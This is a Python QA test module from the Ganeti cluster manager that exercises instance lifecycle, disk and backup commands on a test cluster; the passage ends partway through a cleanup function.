"""Instance related QA tests.
"""
import os
import re
import time
from ganeti import utils
from ganeti import constants
from ganeti import query
from ganeti import pathutils
import qa_config
import qa_utils
import qa_error
from qa_utils import AssertCommand, AssertEqual
from qa_utils import InstanceCheck, INST_DOWN, INST_UP, FIRST_ARG, RETURN_VALUE
from qa_instance_utils import CheckSsconfInstanceList, \
CreateInstanceDrbd8, \
CreateInstanceByDiskTemplate, \
CreateInstanceByDiskTemplateOneNode, \
GetGenericAddParameters
def _GetDiskStatePath(disk):
return "/sys/block/%s/device/state" % disk
def GetInstanceInfo(instance):
"""Return information about the actual state of an instance.
@type instance: string
@param instance: the instance name
@return: a dictionary with the following keys:
- "nodes": instance nodes, a list of strings
- "volumes": instance volume IDs, a list of strings
- "drbd-minors": DRBD minors used by the instance, a dictionary where
keys are nodes, and values are lists of integers (or an empty
dictionary for non-DRBD instances)
- "disk-template": instance disk template
- "storage-type": storage type associated with the instance disk template
"""
node_elem = r"([^,()]+)(?:\s+\([^)]+\))?"
# re_nodelist matches a list of nodes returned by gnt-instance info, e.g.:
# node1.fqdn
# node2.fqdn,node3.fqdn
# node4.fqdn (group mygroup, group UUID 01234567-abcd-0123-4567-0123456789ab)
# FIXME This works with no more than 2 secondaries
re_nodelist = re.compile(node_elem + "(?:," + node_elem + ")?$")
info = qa_utils.GetObjectInfo(["gnt-instance", "info", instance])[0]
nodes = []
for nodeinfo in info["Nodes"]:
if "primary" in nodeinfo:
nodes.append(nodeinfo["primary"])
elif "secondaries" in nodeinfo:
nodestr = nodeinfo["secondaries"]
if nodestr:
m = re_nodelist.match(nodestr)
if m:
nodes.extend(filter(None, m.groups()))
else:
nodes.append(nodestr)
disk_template = info["Disk template"]
if not disk_template:
raise qa_error.Error("Can't get instance disk template")
storage_type = constants.MAP_DISK_TEMPLATE_STORAGE_TYPE[disk_template]
re_drbdnode = re.compile(r"^([^\s,]+),\s+minor=([0-9]+)$")
vols = []
drbd_min = {}
for (count, diskinfo) in enumerate(info["Disks"]):
(dtype, _) = diskinfo["disk/%s" % count].split(",", 1)
if dtype == constants.DT_DRBD8:
for child in diskinfo["child devices"]:
vols.append(child["logical_id"])
for key in ["nodeA", "nodeB"]:
m = re_drbdnode.match(diskinfo[key])
if not m:
raise qa_error.Error("Cannot parse DRBD info: %s" % diskinfo[key])
node = m.group(1)
minor = int(m.group(2))
minorlist = drbd_min.setdefault(node, [])
minorlist.append(minor)
elif dtype == constants.DT_PLAIN:
vols.append(diskinfo["logical_id"])
assert nodes
assert len(nodes) < 2 or vols
return {
"nodes": nodes,
"volumes": vols,
"drbd-minors": drbd_min,
"disk-template": disk_template,
"storage-type": storage_type,
}
def _DestroyInstanceDisks(instance):
"""Remove all the backend disks of an instance.
This is used to simulate HW errors (dead nodes, broken disks...); the
configuration of the instance is not affected.
@type instance: dictionary
@param instance: the instance
"""
info = GetInstanceInfo(instance.name)
# FIXME: destruction/removal should be part of the disk class
if info["storage-type"] == constants.ST_LVM_VG:
vols = info["volumes"]
for node in info["nodes"]:
AssertCommand(["lvremove", "-f"] + vols, node=node)
elif info["storage-type"] in (constants.ST_FILE, constants.ST_SHARED_FILE):
# Note that this works for both file and sharedfile, and this is intended.
storage_dir = qa_config.get("file-storage-dir",
pathutils.DEFAULT_FILE_STORAGE_DIR)
idir = os.path.join(storage_dir, instance.name)
for node in info["nodes"]:
AssertCommand(["rm", "-rf", idir], node=node)
elif info["storage-type"] == constants.ST_DISKLESS:
pass
def _GetInstanceField(instance, field):
"""Get the value of a field of an instance.
@type instance: string
@param instance: Instance name
@type field: string
@param field: Name of the field
@rtype: string
"""
master = qa_config.GetMasterNode()
infocmd = utils.ShellQuoteArgs(["gnt-instance", "list", "--no-headers",
"--units", "m", "-o", field, instance])
return qa_utils.GetCommandOutput(master.primary, infocmd).strip()
def _GetBoolInstanceField(instance, field):
"""Get the Boolean value of a field of an instance.
@type instance: string
@param instance: Instance name
@type field: string
@param field: Name of the field
@rtype: bool
"""
info_out = _GetInstanceField(instance, field)
if info_out == "Y":
return True
elif info_out == "N":
return False
else:
raise qa_error.Error("Field %s of instance %s has a non-Boolean value:"
" %s" % (field, instance, info_out))
def _GetNumInstanceField(instance, field):
"""Get a numeric value of a field of an instance.
@type instance: string
@param instance: Instance name
@type field: string
@param field: Name of the field
@rtype: int or float
"""
info_out = _GetInstanceField(instance, field)
try:
ret = int(info_out)
except ValueError:
try:
ret = float(info_out)
except ValueError:
raise qa_error.Error("Field %s of instance %s has a non-numeric value:"
" %s" % (field, instance, info_out))
return ret
def GetInstanceSpec(instance, spec):
"""Return the current spec for the given parameter.
@type instance: string
@param instance: Instance name
@type spec: string
@param spec: one of the supported parameters: "memory-size", "cpu-count",
"disk-count", "disk-size", "nic-count"
@rtype: tuple
@return: (minspec, maxspec); minspec and maxspec can be different only for
memory and disk size
"""
specmap = {
"memory-size": ["be/minmem", "be/maxmem"],
"cpu-count": ["vcpus"],
"disk-count": ["disk.count"],
"disk-size": ["disk.size/ "],
"nic-count": ["nic.count"],
}
# For disks, first we need the number of disks
if spec == "disk-size":
(numdisk, _) = GetInstanceSpec(instance, "disk-count")
fields = ["disk.size/%s" % k for k in range(0, numdisk)]
else:
assert spec in specmap, "%s not in %s" % (spec, specmap)
fields = specmap[spec]
values = [_GetNumInstanceField(instance, f) for f in fields]
return (min(values), max(values))
def IsFailoverSupported(instance):
return instance.disk_template in constants.DTS_MIRRORED
def IsMigrationSupported(instance):
return instance.disk_template in constants.DTS_MIRRORED
def IsDiskReplacingSupported(instance):
return instance.disk_template == constants.DT_DRBD8
def IsDiskSupported(instance):
return instance.disk_template != constants.DT_DISKLESS
def TestInstanceAddWithPlainDisk(nodes, fail=False):
"""gnt-instance add -t plain"""
if constants.DT_PLAIN in qa_config.GetEnabledDiskTemplates():
instance = CreateInstanceByDiskTemplateOneNode(nodes, constants.DT_PLAIN,
fail=fail)
if not fail:
qa_utils.RunInstanceCheck(instance, True)
return instance
@InstanceCheck(None, INST_UP, RETURN_VALUE)
def TestInstanceAddWithDrbdDisk(nodes):
"""gnt-instance add -t drbd"""
if constants.DT_DRBD8 in qa_config.GetEnabledDiskTemplates():
return CreateInstanceDrbd8(nodes)
@InstanceCheck(None, INST_UP, RETURN_VALUE)
def TestInstanceAddFile(nodes):
"""gnt-instance add -t file"""
assert len(nodes) == 1
if constants.DT_FILE in qa_config.GetEnabledDiskTemplates():
return CreateInstanceByDiskTemplateOneNode(nodes, constants.DT_FILE)
@InstanceCheck(None, INST_UP, RETURN_VALUE)
def TestInstanceAddSharedFile(nodes):
"""gnt-instance add -t sharedfile"""
assert len(nodes) == 1
if constants.DT_SHARED_FILE in qa_config.GetEnabledDiskTemplates():
return CreateInstanceByDiskTemplateOneNode(nodes, constants.DT_SHARED_FILE)
@InstanceCheck(None, INST_UP, RETURN_VALUE)
def TestInstanceAddDiskless(nodes):
"""gnt-instance add -t diskless"""
assert len(nodes) == 1
if constants.DT_DISKLESS in qa_config.GetEnabledDiskTemplates():
return CreateInstanceByDiskTemplateOneNode(nodes, constants.DT_DISKLESS)
@InstanceCheck(None, INST_DOWN, FIRST_ARG)
def TestInstanceRemove(instance):
"""gnt-instance remove"""
AssertCommand(["gnt-instance", "remove", "-f", instance.name])
@InstanceCheck(INST_DOWN, INST_UP, FIRST_ARG)
def TestInstanceStartup(instance):
"""gnt-instance startup"""
AssertCommand(["gnt-instance", "startup", instance.name])
@InstanceCheck(INST_UP, INST_DOWN, FIRST_ARG)
def TestInstanceShutdown(instance):
"""gnt-instance shutdown"""
AssertCommand(["gnt-instance", "shutdown", instance.name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceReboot(instance):
"""gnt-instance reboot"""
options = qa_config.get("options", {})
reboot_types = options.get("reboot-types", constants.REBOOT_TYPES)
name = instance.name
for rtype in reboot_types:
AssertCommand(["gnt-instance", "reboot", "--type=%s" % rtype, name])
AssertCommand(["gnt-instance", "shutdown", name])
qa_utils.RunInstanceCheck(instance, False)
AssertCommand(["gnt-instance", "reboot", name])
master = qa_config.GetMasterNode()
cmd = ["gnt-instance", "list", "--no-headers", "-o", "status", name]
result_output = qa_utils.GetCommandOutput(master.primary,
utils.ShellQuoteArgs(cmd))
AssertEqual(result_output.strip(), constants.INSTST_RUNNING)
@InstanceCheck(INST_DOWN, INST_DOWN, FIRST_ARG)
def TestInstanceReinstall(instance):
"""gnt-instance reinstall"""
if instance.disk_template == constants.DT_DISKLESS:
print qa_utils.FormatInfo("Test not supported for diskless instances")
return
AssertCommand(["gnt-instance", "reinstall", "-f", instance.name])
# Test with non-existant OS definition
AssertCommand(["gnt-instance", "reinstall", "-f",
"--os-type=NonExistantOsForQa",
instance.name],
fail=True)
@InstanceCheck(INST_DOWN, INST_DOWN, FIRST_ARG)
def TestInstanceRenameAndBack(rename_source, rename_target):
"""gnt-instance rename
This must leave the instance with the original name, not the target
name.
"""
CheckSsconfInstanceList(rename_source)
# first do a rename to a different actual name, expecting it to fail
qa_utils.AddToEtcHosts(["meeeeh-not-exists", rename_target])
try:
AssertCommand(["gnt-instance", "rename", rename_source, rename_target],
fail=True)
CheckSsconfInstanceList(rename_source)
finally:
qa_utils.RemoveFromEtcHosts(["meeeeh-not-exists", rename_target])
info = GetInstanceInfo(rename_source)
# Check instance volume tags correctly updated. Note that this check is lvm
# specific, so we skip it for non-lvm-based instances.
# FIXME: This will need updating when instances will be able to have
# different disks living on storage pools with etherogeneous storage types.
# FIXME: This check should be put inside the disk/storage class themselves,
# rather than explicitly called here.
if info["storage-type"] == constants.ST_LVM_VG:
# In the lvm world we can check for tags on the logical volume
tags_cmd = ("lvs -o tags --noheadings %s | grep " %
(" ".join(info["volumes"]), ))
else:
# Other storage types don't have tags, so we use an always failing command,
# to make sure it never gets executed
tags_cmd = "false"
# and now rename instance to rename_target...
AssertCommand(["gnt-instance", "rename", rename_source, rename_target])
CheckSsconfInstanceList(rename_target)
qa_utils.RunInstanceCheck(rename_source, False)
qa_utils.RunInstanceCheck(rename_target, False)
# NOTE: tags might not be the exactly as the instance name, due to
# charset restrictions; hence the test might be flaky
if (rename_source != rename_target and
info["storage-type"] == constants.ST_LVM_VG):
for node in info["nodes"]:
AssertCommand(tags_cmd + rename_source, node=node, fail=True)
AssertCommand(tags_cmd + rename_target, node=node, fail=False)
# and back
AssertCommand(["gnt-instance", "rename", rename_target, rename_source])
CheckSsconfInstanceList(rename_source)
qa_utils.RunInstanceCheck(rename_target, False)
if (rename_source != rename_target and
info["storage-type"] == constants.ST_LVM_VG):
for node in info["nodes"]:
AssertCommand(tags_cmd + rename_source, node=node, fail=False)
AssertCommand(tags_cmd + rename_target, node=node, fail=True)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceFailover(instance):
"""gnt-instance failover"""
if not IsFailoverSupported(instance):
print qa_utils.FormatInfo("Instance doesn't support failover, skipping"
" test")
return
cmd = ["gnt-instance", "failover", "--force", instance.name]
# failover ...
AssertCommand(cmd)
qa_utils.RunInstanceCheck(instance, True)
# ... and back
AssertCommand(cmd)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceMigrate(instance, toggle_always_failover=True):
"""gnt-instance migrate"""
if not IsMigrationSupported(instance):
print qa_utils.FormatInfo("Instance doesn't support migration, skipping"
" test")
return
cmd = ["gnt-instance", "migrate", "--force", instance.name]
af_par = constants.BE_ALWAYS_FAILOVER
af_field = "be/" + constants.BE_ALWAYS_FAILOVER
af_init_val = _GetBoolInstanceField(instance.name, af_field)
# migrate ...
AssertCommand(cmd)
# TODO: Verify the choice between failover and migration
qa_utils.RunInstanceCheck(instance, True)
# ... and back (possibly with always_failover toggled)
if toggle_always_failover:
AssertCommand(["gnt-instance", "modify", "-B",
("%s=%s" % (af_par, not af_init_val)),
instance.name])
AssertCommand(cmd)
# TODO: Verify the choice between failover and migration
qa_utils.RunInstanceCheck(instance, True)
if toggle_always_failover:
AssertCommand(["gnt-instance", "modify", "-B",
("%s=%s" % (af_par, af_init_val)), instance.name])
# TODO: Split into multiple tests
AssertCommand(["gnt-instance", "shutdown", instance.name])
qa_utils.RunInstanceCheck(instance, False)
AssertCommand(cmd, fail=True)
AssertCommand(["gnt-instance", "migrate", "--force", "--allow-failover",
instance.name])
AssertCommand(["gnt-instance", "start", instance.name])
AssertCommand(cmd)
# @InstanceCheck enforces the check that the instance is running
qa_utils.RunInstanceCheck(instance, True)
AssertCommand(["gnt-instance", "modify", "-B",
("%s=%s" %
(constants.BE_ALWAYS_FAILOVER, constants.VALUE_TRUE)),
instance.name])
AssertCommand(cmd)
qa_utils.RunInstanceCheck(instance, True)
# TODO: Verify that a failover has been done instead of a migration
# TODO: Verify whether the default value is restored here (not hardcoded)
AssertCommand(["gnt-instance", "modify", "-B",
("%s=%s" %
(constants.BE_ALWAYS_FAILOVER, constants.VALUE_FALSE)),
instance.name])
AssertCommand(cmd)
qa_utils.RunInstanceCheck(instance, True)
def TestInstanceInfo(instance):
"""gnt-instance info"""
AssertCommand(["gnt-instance", "info", instance.name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceModify(instance):
"""gnt-instance modify"""
default_hv = qa_config.GetDefaultHypervisor()
# Assume /sbin/init exists on all systems
test_kernel = "/sbin/init"
test_initrd = test_kernel
orig_maxmem = qa_config.get(constants.BE_MAXMEM)
orig_minmem = qa_config.get(constants.BE_MINMEM)
#orig_bridge = qa_config.get("bridge", "xen-br0")
args = [
["-B", "%s=128" % constants.BE_MINMEM],
["-B", "%s=128" % constants.BE_MAXMEM],
["-B", "%s=%s,%s=%s" % (constants.BE_MINMEM, orig_minmem,
constants.BE_MAXMEM, orig_maxmem)],
["-B", "%s=2" % constants.BE_VCPUS],
["-B", "%s=1" % constants.BE_VCPUS],
["-B", "%s=%s" % (constants.BE_VCPUS, constants.VALUE_DEFAULT)],
["-B", "%s=%s" % (constants.BE_ALWAYS_FAILOVER, constants.VALUE_TRUE)],
["-B", "%s=%s" % (constants.BE_ALWAYS_FAILOVER, constants.VALUE_DEFAULT)],
["-H", "%s=%s" % (constants.HV_KERNEL_PATH, test_kernel)],
["-H", "%s=%s" % (constants.HV_KERNEL_PATH, constants.VALUE_DEFAULT)],
# TODO: bridge tests
#["--bridge", "xen-br1"],
#["--bridge", orig_bridge],
]
if default_hv == constants.HT_XEN_PVM:
args.extend([
["-H", "%s=%s" % (constants.HV_INITRD_PATH, test_initrd)],
["-H", "no_%s" % (constants.HV_INITRD_PATH, )],
["-H", "%s=%s" % (constants.HV_INITRD_PATH, constants.VALUE_DEFAULT)],
])
elif default_hv == constants.HT_XEN_HVM:
args.extend([
["-H", "%s=acn" % constants.HV_BOOT_ORDER],
["-H", "%s=%s" % (constants.HV_BOOT_ORDER, constants.VALUE_DEFAULT)],
])
elif default_hv == constants.HT_KVM and \
qa_config.TestEnabled("instance-device-hotplug"):
args.extend([
["--net", "-1:add", "--hotplug"],
["--net", "-1:modify,mac=aa:bb:cc:dd:ee:ff", "--hotplug", "--force"],
["--net", "-1:remove", "--hotplug"],
["--disk", "-1:add,size=1G", "--hotplug"],
["--disk", "-1:remove", "--hotplug"],
])
for alist in args:
AssertCommand(["gnt-instance", "modify"] + alist + [instance.name])
# check no-modify
AssertCommand(["gnt-instance", "modify", instance.name], fail=True)
# Marking offline while instance is running must fail...
AssertCommand(["gnt-instance", "modify", "--offline", instance.name],
fail=True)
# ...while making it online is ok, and should work
AssertCommand(["gnt-instance", "modify", "--online", instance.name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceModifyPrimaryAndBack(instance, currentnode, othernode):
"""gnt-instance modify --new-primary
This will leave the instance on its original primary node, not other node.
"""
if instance.disk_template != constants.DT_FILE:
print qa_utils.FormatInfo("Test only supported for the file disk template")
return
cluster_name = qa_config.get("name")
name = instance.name
current = currentnode.primary
other = othernode.primary
filestorage = qa_config.get("file-storage-dir",
pathutils.DEFAULT_FILE_STORAGE_DIR)
disk = os.path.join(filestorage, name)
AssertCommand(["gnt-instance", "modify", "--new-primary=%s" % other, name],
fail=True)
AssertCommand(["gnt-instance", "shutdown", name])
AssertCommand(["scp", "-oGlobalKnownHostsFile=%s" %
pathutils.SSH_KNOWN_HOSTS_FILE,
"-oCheckHostIp=no", "-oStrictHostKeyChecking=yes",
"-oHashKnownHosts=no", "-oHostKeyAlias=%s" % cluster_name,
"-r", disk, "%s:%s" % (other, filestorage)], node=current)
AssertCommand(["gnt-instance", "modify", "--new-primary=%s" % other, name])
AssertCommand(["gnt-instance", "startup", name])
# and back
AssertCommand(["gnt-instance", "shutdown", name])
AssertCommand(["rm", "-rf", disk], node=other)
AssertCommand(["gnt-instance", "modify", "--new-primary=%s" % current, name])
AssertCommand(["gnt-instance", "startup", name])
@InstanceCheck(INST_DOWN, INST_DOWN, FIRST_ARG)
def TestInstanceStoppedModify(instance):
"""gnt-instance modify (stopped instance)"""
name = instance.name
# Instance was not marked offline; try marking it online once more
AssertCommand(["gnt-instance", "modify", "--online", name])
# Mark instance as offline
AssertCommand(["gnt-instance", "modify", "--offline", name])
# When the instance is offline shutdown should only work with --force,
# while start should never work
AssertCommand(["gnt-instance", "shutdown", name], fail=True)
AssertCommand(["gnt-instance", "shutdown", "--force", name])
AssertCommand(["gnt-instance", "start", name], fail=True)
AssertCommand(["gnt-instance", "start", "--force", name], fail=True)
# Also do offline to offline
AssertCommand(["gnt-instance", "modify", "--offline", name])
# And online again
AssertCommand(["gnt-instance", "modify", "--online", name])
@InstanceCheck(INST_DOWN, INST_DOWN, FIRST_ARG)
def TestInstanceConvertDiskToPlain(instance, inodes):
"""gnt-instance modify -t"""
name = instance.name
template = instance.disk_template
if template != constants.DT_DRBD8:
print qa_utils.FormatInfo("Unsupported template %s, skipping conversion"
" test" % template)
return
assert len(inodes) == 2
AssertCommand(["gnt-instance", "modify", "-t", constants.DT_PLAIN, name])
AssertCommand(["gnt-instance", "modify", "-t", constants.DT_DRBD8,
"-n", inodes[1].primary, name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceModifyDisks(instance):
"""gnt-instance modify --disk"""
if not IsDiskSupported(instance):
print qa_utils.FormatInfo("Instance doesn't support disks, skipping test")
return
disk_conf = qa_config.GetDiskOptions()[-1]
size = disk_conf.get("size")
name = instance.name
build_cmd = lambda arg: ["gnt-instance", "modify", "--disk", arg, name]
if qa_config.AreSpindlesSupported():
spindles = disk_conf.get("spindles")
spindles_supported = True
else:
# Any number is good for spindles in this case
spindles = 1
spindles_supported = False
AssertCommand(build_cmd("add:size=%s,spindles=%s" % (size, spindles)),
fail=not spindles_supported)
AssertCommand(build_cmd("add:size=%s" % size),
fail=spindles_supported)
# Exactly one of the above commands has succeded, so we need one remove
AssertCommand(build_cmd("remove"))
@InstanceCheck(INST_DOWN, INST_DOWN, FIRST_ARG)
def TestInstanceGrowDisk(instance):
"""gnt-instance grow-disk"""
if instance.disk_template == constants.DT_DISKLESS:
print qa_utils.FormatInfo("Test not supported for diskless instances")
return
name = instance.name
disks = qa_config.GetDiskOptions()
all_size = [d.get("size") for d in disks]
all_grow = [d.get("growth") for d in disks]
if not all_grow:
# missing disk sizes but instance grow disk has been enabled,
# let's set fixed/nomimal growth
all_grow = ["128M" for _ in all_size]
for idx, (size, grow) in enumerate(zip(all_size, all_grow)):
# succeed in grow by amount
AssertCommand(["gnt-instance", "grow-disk", name, str(idx), grow])
# fail in grow to the old size
AssertCommand(["gnt-instance", "grow-disk", "--absolute", name, str(idx),
size], fail=True)
# succeed to grow to old size + 2 * growth
int_size = utils.ParseUnit(size)
int_grow = utils.ParseUnit(grow)
AssertCommand(["gnt-instance", "grow-disk", "--absolute", name, str(idx),
str(int_size + 2 * int_grow)])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceDeviceNames(instance):
if instance.disk_template == constants.DT_DISKLESS:
print qa_utils.FormatInfo("Test not supported for diskless instances")
return
name = instance.name
for dev_type in ["disk", "net"]:
if dev_type == "disk":
options = ",size=512M"
if qa_config.AreSpindlesSupported():
options += ",spindles=1"
else:
options = ""
# succeed in adding a device named 'test_device'
AssertCommand(["gnt-instance", "modify",
"--%s=-1:add,name=test_device%s" % (dev_type, options),
name])
# succeed in removing the 'test_device'
AssertCommand(["gnt-instance", "modify",
"--%s=test_device:remove" % dev_type,
name])
# fail to add two devices with the same name
AssertCommand(["gnt-instance", "modify",
"--%s=-1:add,name=test_device%s" % (dev_type, options),
"--%s=-1:add,name=test_device%s" % (dev_type, options),
name], fail=True)
# fail to add a device with invalid name
AssertCommand(["gnt-instance", "modify",
"--%s=-1:add,name=2%s" % (dev_type, options),
name], fail=True)
# Rename disks
disks = qa_config.GetDiskOptions()
disk_names = [d.get("name") for d in disks]
for idx, disk_name in enumerate(disk_names):
# Refer to disk by idx
AssertCommand(["gnt-instance", "modify",
"--disk=%s:modify,name=renamed" % idx,
name])
# Refer to by name and rename to original name
AssertCommand(["gnt-instance", "modify",
"--disk=renamed:modify,name=%s" % disk_name,
name])
if len(disks) >= 2:
# fail in renaming to disks to the same name
AssertCommand(["gnt-instance", "modify",
"--disk=0:modify,name=same_name",
"--disk=1:modify,name=same_name",
name], fail=True)
def TestInstanceList():
"""gnt-instance list"""
qa_utils.GenericQueryTest("gnt-instance", query.INSTANCE_FIELDS.keys())
def TestInstanceListFields():
"""gnt-instance list-fields"""
qa_utils.GenericQueryFieldsTest("gnt-instance", query.INSTANCE_FIELDS.keys())
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceConsole(instance):
"""gnt-instance console"""
AssertCommand(["gnt-instance", "console", "--show-cmd", instance.name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestReplaceDisks(instance, curr_nodes, other_nodes):
"""gnt-instance replace-disks"""
def buildcmd(args):
cmd = ["gnt-instance", "replace-disks"]
cmd.extend(args)
cmd.append(instance.name)
return cmd
if not IsDiskReplacingSupported(instance):
print qa_utils.FormatInfo("Instance doesn't support disk replacing,"
" skipping test")
return
# Currently all supported templates have one primary and one secondary node
assert len(curr_nodes) == 2
snode = curr_nodes[1]
assert len(other_nodes) == 1
othernode = other_nodes[0]
options = qa_config.get("options", {})
use_ialloc = options.get("use-iallocators", True)
for data in [
["-p"],
["-s"],
# A placeholder; the actual command choice depends on use_ialloc
None,
# Restore the original secondary
["--new-secondary=%s" % snode.primary],
]:
if data is None:
if use_ialloc:
data = ["-I", constants.DEFAULT_IALLOCATOR_SHORTCUT]
else:
data = ["--new-secondary=%s" % othernode.primary]
AssertCommand(buildcmd(data))
AssertCommand(buildcmd(["-a"]))
AssertCommand(["gnt-instance", "stop", instance.name])
AssertCommand(buildcmd(["-a"]), fail=True)
AssertCommand(["gnt-instance", "activate-disks", instance.name])
AssertCommand(["gnt-instance", "activate-disks", "--wait-for-sync",
instance.name])
AssertCommand(buildcmd(["-a"]))
AssertCommand(["gnt-instance", "start", instance.name])
def _AssertRecreateDisks(cmdargs, instance, fail=False, check=True,
destroy=True):
"""Execute gnt-instance recreate-disks and check the result
@param cmdargs: Arguments (instance name excluded)
@param instance: Instance to operate on
@param fail: True if the command is expected to fail
@param check: If True and fail is False, check that the disks work
@prama destroy: If True, destroy the old disks first
"""
if destroy:
_DestroyInstanceDisks(instance)
AssertCommand((["gnt-instance", "recreate-disks"] + cmdargs +
[instance.name]), fail)
if not fail and check:
# Quick check that the disks are there
AssertCommand(["gnt-instance", "activate-disks", instance.name])
AssertCommand(["gnt-instance", "activate-disks", "--wait-for-sync",
instance.name])
AssertCommand(["gnt-instance", "deactivate-disks", instance.name])
def _BuildRecreateDisksOpts(en_disks, with_spindles, with_growth,
spindles_supported):
if with_spindles:
if spindles_supported:
if with_growth:
build_spindles_opt = (lambda disk:
",spindles=%s" %
(disk["spindles"] + disk["spindles-growth"]))
else:
build_spindles_opt = (lambda disk:
",spindles=%s" % disk["spindles"])
else:
build_spindles_opt = (lambda _: ",spindles=1")
else:
build_spindles_opt = (lambda _: "")
if with_growth:
build_size_opt = (lambda disk:
"size=%s" % (utils.ParseUnit(disk["size"]) +
utils.ParseUnit(disk["growth"])))
else:
build_size_opt = (lambda disk: "size=%s" % disk["size"])
build_disk_opt = (lambda (idx, disk):
"--disk=%s:%s%s" % (idx, build_size_opt(disk),
build_spindles_opt(disk)))
return map(build_disk_opt, en_disks)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestRecreateDisks(instance, inodes, othernodes):
"""gnt-instance recreate-disks
@param instance: Instance to work on
@param inodes: List of the current nodes of the instance
@param othernodes: list/tuple of nodes where to temporarily recreate disks
"""
options = qa_config.get("options", {})
use_ialloc = options.get("use-iallocators", True)
other_seq = ":".join([n.primary for n in othernodes])
orig_seq = ":".join([n.primary for n in inodes])
# These fail because the instance is running
_AssertRecreateDisks(["-n", other_seq], instance, fail=True, destroy=False)
if use_ialloc:
_AssertRecreateDisks(["-I", "hail"], instance, fail=True, destroy=False)
else:
_AssertRecreateDisks(["-n", other_seq], instance, fail=True, destroy=False)
AssertCommand(["gnt-instance", "stop", instance.name])
# Disks exist: this should fail
_AssertRecreateDisks([], instance, fail=True, destroy=False)
# Unsupported spindles parameters: fail
if not qa_config.AreSpindlesSupported():
_AssertRecreateDisks(["--disk=0:spindles=2"], instance,
fail=True, destroy=False)
# Recreate disks in place
_AssertRecreateDisks([], instance)
# Move disks away
if use_ialloc:
_AssertRecreateDisks(["-I", "hail"], instance)
# Move disks somewhere else
_AssertRecreateDisks(["-I", constants.DEFAULT_IALLOCATOR_SHORTCUT],
instance)
else:
_AssertRecreateDisks(["-n", other_seq], instance)
# Move disks back
_AssertRecreateDisks(["-n", orig_seq], instance)
# Recreate resized disks
# One of the two commands fails because either spindles are given when they
# should not or vice versa
alldisks = qa_config.GetDiskOptions()
spindles_supported = qa_config.AreSpindlesSupported()
disk_opts = _BuildRecreateDisksOpts(enumerate(alldisks), True, True,
spindles_supported)
_AssertRecreateDisks(disk_opts, instance, destroy=True,
fail=not spindles_supported)
disk_opts = _BuildRecreateDisksOpts(enumerate(alldisks), False, True,
spindles_supported)
_AssertRecreateDisks(disk_opts, instance, destroy=False,
fail=spindles_supported)
# Recreate the disks one by one (with the original size)
for (idx, disk) in enumerate(alldisks):
# Only the first call should destroy all the disk
destroy = (idx == 0)
# Again, one of the two commands is expected to fail
disk_opts = _BuildRecreateDisksOpts([(idx, disk)], True, False,
spindles_supported)
_AssertRecreateDisks(disk_opts, instance, destroy=destroy, check=False,
fail=not spindles_supported)
disk_opts = _BuildRecreateDisksOpts([(idx, disk)], False, False,
spindles_supported)
_AssertRecreateDisks(disk_opts, instance, destroy=False, check=False,
fail=spindles_supported)
# This and InstanceCheck decoration check that the disks are working
AssertCommand(["gnt-instance", "reinstall", "-f", instance.name])
AssertCommand(["gnt-instance", "start", instance.name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceExport(instance, node):
"""gnt-backup export -n ..."""
name = instance.name
# Export does not work for file-based templates, thus we skip the test
if instance.disk_template in [constants.DT_FILE, constants.DT_SHARED_FILE]:
return
AssertCommand(["gnt-backup", "export", "-n", node.primary, name])
return qa_utils.ResolveInstanceName(name)
@InstanceCheck(None, INST_DOWN, FIRST_ARG)
def TestInstanceExportWithRemove(instance, node):
"""gnt-backup export --remove-instance"""
AssertCommand(["gnt-backup", "export", "-n", node.primary,
"--remove-instance", instance.name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceExportNoTarget(instance):
"""gnt-backup export (without target node, should fail)"""
AssertCommand(["gnt-backup", "export", instance.name], fail=True)
@InstanceCheck(None, INST_DOWN, FIRST_ARG)
def TestInstanceImport(newinst, node, expnode, name):
"""gnt-backup import"""
templ = constants.DT_PLAIN
if not qa_config.IsTemplateSupported(templ):
return
cmd = (["gnt-backup", "import",
"--disk-template=%s" % templ,
"--no-ip-check",
"--src-node=%s" % expnode.primary,
"--src-dir=%s/%s" % (pathutils.EXPORT_DIR, name),
"--node=%s" % node.primary] +
GetGenericAddParameters(newinst, templ,
force_mac=constants.VALUE_GENERATE))
cmd.append(newinst.name)
AssertCommand(cmd)
newinst.SetDiskTemplate(templ)
def TestBackupList(expnode):
"""gnt-backup list"""
AssertCommand(["gnt-backup", "list", "--node=%s" % expnode.primary])
qa_utils.GenericQueryTest("gnt-backup", query.EXPORT_FIELDS.keys(),
namefield=None, test_unknown=False)
def TestBackupListFields():
"""gnt-backup list-fields"""
qa_utils.GenericQueryFieldsTest("gnt-backup", query.EXPORT_FIELDS.keys())
def TestRemoveInstanceOfflineNode(instance, snode, set_offline, set_online):
"""gnt-instance remove with an off-line node
@param instance: instance
@param snode: secondary node, to be set offline
@param set_offline: function to call to set the node off-line
@param set_online: function to call to set the node on-line
"""
info = GetInstanceInfo(instance.name)
set_offline(snode)
try:
TestInstanceRemove(instance)
finally:
set_online(snode)
# Clean up the disks on the offline node, if necessary
if instance.disk_template not in constants.DTS_EXT_MIRROR:
# FIXME: abstract the cleanup inside the disks
if info["storage-type"] == constants.ST_LVM_VG:
for minor in info["drbd-minors"][snode.primary]:
# DRBD 8.3 syntax comes first, then DRBD 8.4 syntax. The 8.4 syntax
# relies on the fact that we always create a resources for each minor,
# and that this resources is always named resource{minor}.
# As 'drbdsetup 0 down' does return success (even though that's invalid
# syntax), we always have to perform both commands and ignore the
# output.
drbd_shutdown_cmd = \
"(drbdsetup %d down >/dev/null 2>&1;" \
" drbdsetup down resource%d >/dev/null 2>&1) || /bin/true" % \
(minor, minor)
AssertCommand(drbd_shutdown_cmd, node=snode)
AssertCommand(["lvremove", "-f"] + info["volumes"], node=snode)
elif info["storage-type"] == constants.ST_FILE:
